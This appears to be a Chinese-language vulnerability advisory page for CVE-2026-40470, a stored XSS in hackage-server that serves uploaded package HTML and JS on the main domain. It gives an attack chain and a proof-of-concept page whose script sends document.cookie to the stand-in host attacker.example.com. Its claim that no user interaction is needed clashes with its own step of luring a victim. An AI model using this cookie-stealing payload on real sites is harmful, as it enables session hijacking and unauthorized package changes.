CVE-2026-40470 CVSS 9.9 严重

CVE-2026-40470 hackage-server 存储型XSS漏洞

披露日期: 2026-04-23

来源: 74b3a70d-cca6-4d34-9789-e83b222ae3be

漏洞信息

漏洞编号

CVE-2026-40470

漏洞类型

XSS

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

hackage-server, hackage.haskell.org

漏洞概述

hackage-server 和 hackage.haskell.org 存在严重的跨站脚本（XSS）漏洞。由于服务器将源包或文档上传中的 HTML 和 JavaScript 文件直接在主域名上提供服务，攻击者可利用此漏洞劫持拥有 HTTP 凭证的用户会话。当受害者浏览恶意维护者上传的页面时，攻击者可执行上传包、修改元数据等授权操作。

技术细节

该漏洞属于存储型 XSS，利用了 hackage-server 对用户上传内容缺乏安全校验的缺陷。攻击者以维护者身份上传包含恶意 HTML/JS 的源代码包或文档。服务器未对文件进行转义或隔离，直接在主域 `hackage.haskell.org` 下原样返回。当具有权限的用户访问这些页面时，恶意脚本在主域上下文中执行，能够窃取 Cookie 或利用会话凭证发起 API 请求。由于 CVSS 评分为 9.9，该漏洞无需用户交互即可通过网络远程利用，对系统的机密性和完整性构成极高威胁。

攻击链分析

STEP 1

1. 恶意包准备

攻击者注册成为 hackage 维护者，并准备一个包含恶意 HTML/JavaScript 文件的源代码包或文档压缩包。

STEP 2

2. 上传恶意载荷

攻击者将包含恶意脚本的包上传到 hackage.haskell.org 服务器。

STEP 3

3. 服务端处理

hackage-server 解压并托管文件，直接在主域名下提供恶意 HTML/JS 文件，未进行过滤或隔离。

STEP 4

4. 诱导访问

攻击者诱导具有高权限（如管理员）的目标用户访问该包的页面或文档链接。

STEP 5

5. 执行攻击脚本

目标用户浏览器加载页面，解析并执行恶意 JavaScript 代码。

STEP 6

6. 会话劫持与利用

恶意脚本窃取用户的 Session Cookie 或直接利用浏览器会话，以用户身份调用 API 执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2026-40470: Stored XSS via Documentation Upload -->
<!-- 1. Attacker creates a malicious documentation file (e.g., index.html) -->
<!-- 2. Uploads it as part of a package to hackage.haskell.org -->

<!DOCTYPE html>
<html>
<head>
    <title>Hackage XSS PoC</title>
</head>
<body>
    <h1>Package Documentation</h1>
    <script>
        // Demonstrate XSS by sending document.cookie to an external server
        var payload = document.cookie;
        var attackerUrl = 'https://attacker.example.com/log?key=' + encodeURIComponent(payload);
        
        fetch(attackerUrl)
            .then(response => console.log('Payload sent'))
            .catch(error => console.error('Error sending payload', error));
            
        // Potential action: Change package metadata or upload new version using the victim's session
        // ... 
    </script>
</body>
</html>

影响范围

hackage-server (受影响版本)

防御指南

临时缓解措施

建议管理员立即审查服务器上已上传的包，特别是包含 HTML 或 JavaScript 文件的文档，并移除可疑内容。用户应避免在登录状态下访问来源不明的包文档页面，并在使用后及时登出。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-40470
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-40470
3 Details https://www.cvedetails.com/cve/CVE-2026-40470/
4 VulDB https://vuldb.com/cve/CVE-2026-40470
5 Link https://osv.dev/vulnerability/HSEC-2024-0004

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表